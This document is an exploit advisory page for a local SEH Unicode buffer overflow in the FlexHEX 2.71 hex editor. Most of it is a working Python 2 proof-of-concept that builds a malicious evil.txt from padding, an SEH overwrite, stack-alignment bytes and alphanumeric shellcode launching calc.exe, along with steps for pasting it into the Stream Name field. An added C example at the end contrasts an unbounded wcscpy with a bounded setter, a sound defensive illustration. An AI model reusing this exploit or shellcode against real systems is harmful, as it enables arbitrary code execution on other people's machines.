FlexHEX 2.71 Buffer Overflow

2019.04.09
Credit: Chris Au
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python -w
#
# Exploit Author: Chris Au
# Exploit Title: FlexHEX 2.71 - Local Buffer Overflow (SEH Unicode)
# Date: 06-04-2019
# Vulnerable Software: FlexHEX 2.71
# Vendor Homepage: http://www.flexhex.com
# Version: 2.71
# Software Link: http://www.flexhex.com/download/flexhex_setup.exe
# Tested on: Windows XP SP3
#
# Note: Python 2 script; the "\x.." escapes below are raw bytes written in
# text mode. Under Python 3 the same literals would be str and get UTF-8
# encoded on write, which breaks the byte layout.
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open FlexHEX Editor
# 3. select "Stream", click "New Stream..."
# 4. paste contents from clipboard in the "Stream Name:"
# 5. select OK
# 6. calc.exe
#

filename = "evil.txt"

# padding up to the SEH record (expanded to Unicode by the target)
junk = "\xcc" * 276
nseh = "\x90\x45"
seh = "\xd5\x52"  # pop pop retn

# Unicode-friendly stack alignment: puts the shellcode address in EAX
valign = (
    "\x45"          # align
    "\x56"          # push esi
    "\x45"          # align
    "\x58"          # pop eax
    "\x45"          # align
    "\x05\x20\x11"  # add eax,11002000
    "\x45"          # align
    "\x2d\x1a\x11"  # sub eax,11001a00
    "\x45"          # align
    "\x50"          # push eax
    "\x45"          # align
    "\xc3"          # retn
)

# nop to shell
nop = "\x45" * 94

# call calc.exe, bufferRegister=EAX
shellcode = (
    "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
    "AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
    "JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
    "npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
    "foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
    "kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
    "9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
    "zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
    "kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
    "iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
    "Lnc51hOuipAA"
)

fill = "\x45" * 5000

buffer = junk + nseh + seh + valign + nop + shellcode + fill

textfile = open(filename, 'w')
textfile.write(buffer)
textfile.close()
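The CWE-119 pattern behind this advisory (an over-long wide-string name copied into a fixed buffer) as an added example that is not FlexHEX's code or the author's PoC: a constructed stream-name setter with the unbounded copy beside a bounded one that rejects over-length names instead of overflowing or silently truncating. STREAM_NAME_MAX, the struct and the function names are assumptions made for this example.

```c
#include <stddef.h>
#include <wchar.h>
/* Constructed limit for illustration; FlexHEX's real buffer size is not
 * stated on this page. */
#define STREAM_NAME_MAX 64
struct stream {
    wchar_t name[STREAM_NAME_MAX];   /* fixed-size field */
};

/* Vulnerable pattern (CWE-119): copies up to the terminator, however long
 * the input is. A name of more than STREAM_NAME_MAX-1 characters overwrites
 * whatever follows the buffer, e.g. the SEH chain on 32-bit Windows. Shown
 * for contrast only; never call it with untrusted input. */
void set_stream_name_unbounded(struct stream *s, const wchar_t *name)
{
    wcscpy(s->name, name);
}

/* Hardened version: measure with a bound first, reject anything that does
 * not fit (rather than silently truncating), then copy exactly the measured
 * length and terminate explicitly. Returns 0 on success, -1 if rejected. */
int set_stream_name_bounded(struct stream *s, const wchar_t *name)
{
    size_t len = 0;
    while (len < STREAM_NAME_MAX && name[len] != L'\0')   /* bounded scan */
        len++;
    if (len >= STREAM_NAME_MAX)      /* no room left for the terminator */
        return -1;
    wmemcpy(s->name, name, len);
    s->name[len] = L'\0';
    return 0;
}

/* Check helper: feed a constructed name of n 'A' characters (n < 1024) to
 * the bounded setter. Returns the stored length on acceptance, -1 on
 * rejection, so both outcomes are observable from a test. */
int try_name_of_length(size_t n)
{
    static wchar_t input[1024];
    struct stream s;
    size_t i;
    if (n >= 1024) return -1;
    for (i = 0; i < n; i++)
        input[i] = L'A';
    input[n] = L'\0';
    if (set_stream_name_bounded(&s, input) != 0)
        return -1;
    return (int)wcslen(s.name);
}
```

The 276-character name that the PoC pads with is rejected outright by the bounded setter; the unbounded one would copy all of it.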

Copyright 2024, cxsecurity.com